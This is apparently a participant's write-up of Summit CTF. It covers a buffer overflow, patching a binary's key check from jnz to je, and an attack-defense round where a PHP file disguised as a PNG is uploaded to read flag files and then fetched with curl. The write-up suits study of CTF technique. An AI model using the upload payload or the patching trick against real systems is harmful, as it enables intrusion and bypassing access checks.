Summit CTF had two Categories:
Jeopardy - First 24 Hours
Attack-Defense - In-Person 4 Hours - King of The Hill(KOTH)/Castle vs Castle

Jeopardy Style - Reverse Engineering Challenges
1. What’s Up
2. Do You Even Rev Bro?
Attack Defense - King of The Hill

Jeopardy Style

Reverse Enginnering

What’s Up?

Description - We have to connect to given ip using netcat (nc 0.cloud.chals.io 25649) which contains flag. Binary of program running on server is also provided - “challenge”.

  • Opened given binary “challenge” in ghidra Ghidra-Disassembly of binary
  • flag.txt is on server but not printed by main function
  • We can do Buffer Overflow on local_38 by entering any value > 32 (its size) Buffer Overflow Attack Printing Flag

Do You Even Rev Bro?

Description - Given Binary

  • Opened binary in ghidra
  • Main/entry Function Entry Function of Binary
  • Double Click to open FUN_00401227 alt text
  • Decryption Taking Place in this function
  • Line 37 checks for correct key to be entered
  • if condition checking key
  • We can change if (iVar1 == 0) to get true every time to decrypt & print flag regardless of entered key by user
  • Change jnz to je so that if (iVar1 == 0) is always true Original Function
  • I used Cutter to edit assembly function from jnz to jz since it is easier in cutter Cutter Edit of JE Function
  • Close file in cutter without saving
  • Run Patched Binary in Terminal Flag
  • Summit_CTF{idk_h0w_t0_c0d3}

Attack Defense - King of The Hill Castle

Infrastructure Description -

  • 4 Machines with Each Team, all teams have same machines
  • All 4 Machines running Web Servers
  • Total 12 Teams
  • Flags stored in /tmp/flag.txt & /root/flag.txt & Updated Every 10 minutes
  • Initial Login using SSH - Credentials Provided by Organizers

Scoring

  • We were scored for submitting both our flags on our 4 machines and other machines that we pwned
  • If someone could destroy our machines(make them inaccessible to use), we couldn’t submit our flag => –points and vice-versa

Infrastructure Subnets

Competing: I worked on Attack side while my other two teammates worked on system hardening and fixing vulnerabilities

  • Scanning - Started with nmap scan on whole subnet
  • Found File-Upload option in File Upload Vulnerable Machines

http://172.30.1.61 & 81,91,101,111,121

  • Exploit Make Exploit $ nano intigriti.png.php <?php echo file_get_contents('/tmp/flag.txt'); ?>

Go To -> http://172.30.1.61/ -> UPLOAD intigriti.png.php

RUN in Terminal curl http://172.30.1.61/uploads/intigriti.png.php flag_xyz........

  • We collected the flags from terminal and uploaded them on scoreboard
  • Intially we did good on both attack & defense side during second half but couldn’t pwn all machines Initial Score During Second Half
Team 7: Pirates Bay - This is not final score

Conclusion Overall Amazing Experience in King of The Hill. Will improve by automating flag submission as one of the other teams did from UNG, manually retrieving and submitting flags is slow and boring.

Virginia Tech Campus

Virginia Tech Campus